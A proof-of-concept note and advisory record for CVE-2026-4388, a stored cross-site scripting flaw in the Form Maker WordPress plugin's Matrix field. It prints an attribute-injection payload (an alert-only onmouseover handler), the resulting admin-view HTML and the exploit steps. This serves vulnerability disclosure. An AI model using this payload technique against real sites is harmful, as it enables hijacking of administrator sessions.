CVE-2026-4388

/* * PoC for CVE-2026-4388 * Stored XSS in Form Maker by 10Word (Matrix Field) */ // Description: // The plugin uses sanitize_text_field() which strips HTML tags but preserves quotes. // We can inject an event handler into the input attribute. // Payload to be submitted in the Matrix field (Text Box): // " onmouseover="alert('CVE-2026-4388')" " // HTML Rendering in Admin View (Vulnerable): // <input type="text" value="" onmouseover="alert('CVE-2026-4388')" " /> // Exploit Steps: // 1. Attacker sends the payload via the public form submission. // 2. Admin logs in and views the submission. // 3. XSS triggers upon mouse interaction.

{"cve": {"id": "CVE-2026-4388", "sourceIdentifier": "[email protected]", "published": "2026-04-14T03:16:08.720", "lastModified": "2026-04-22T20:23:16.350", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Form Maker by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Matrix field (Text Box input type) in form submissions in all versions up to, and including, 1.15.40. This is due to insufficient input sanitization (`sanitize_text_field` strips tags but not quotes) and missing output escaping when rendering submission data in the admin Submissions view. This makes it possible for unauthenticated attackers to inject arbitrary JavaScript through a form submission that executes in the browser of an administrator who views the submission details."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/admin/views/FormMakerSubmits.php#L166", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/admin/views/FormMakerSubmits.php#L169", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/frontend/models/form_maker.php#L2352", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3501693%40form-maker%2Ftrunk&old=3492680%40form-maker%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/197449f5-9304-49df-9261-a354145fc00e?source=cve", "source": "[email protected]"}]}}